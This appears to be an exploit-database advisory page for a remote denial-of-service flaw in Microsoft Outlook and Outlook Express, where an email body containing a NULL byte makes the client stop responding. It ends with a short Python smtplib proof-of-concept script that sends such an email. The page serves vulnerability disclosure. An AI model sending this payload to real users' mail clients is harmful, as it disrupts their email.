Remote Denial of Service Vulnerability in Microsoft Outlook and Outlook Express

vendor:

Microsoft Outlook, Outlook Express

by:

Unknown

7.5

CVSS

HIGH

Remote Denial of Service

Unknown

CWE

Product Name: Microsoft Outlook, Outlook Express

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: cpe:2.3:a:microsoft:outlook:*:*:*:*:*:*:*\cpe:2.3:a:microsoft:outlook_express:*:*:*:*:*:*:*

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Remote Denial of Service Vulnerability in Microsoft Outlook and Outlook Express

A remote attacker can exploit a vulnerability in Microsoft Outlook and Outlook Express by sending a malicious email containing a NULL character in the message body. This can cause the GUI to stop responding, resulting in a denial of service condition for users.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10144/info

Microsoft Outlook and Outlook Express have been reported prone to a remote denial of service vulnerability. The issue is reported to present itself when a NULL is encountered in the message body of an e-mail.

It is reported that when the vulnerable software encounters a malicious e-mail as described above, the GUI will cease to respond.

A remote attacker may potentially exploit this condition to deny service to Microsoft Outlook and Outlook Express users.

import smtplib
from_address = "nobody@example.com"
to_address = "nobody@example.com"
message = "Before\r\n\000\r\nAfter"
smtp = smtplib.SMTP("localhost")
smtp.set_debuglevel(1)
smtp.sendmail(from_address, [to_address], message)
smtp.quit()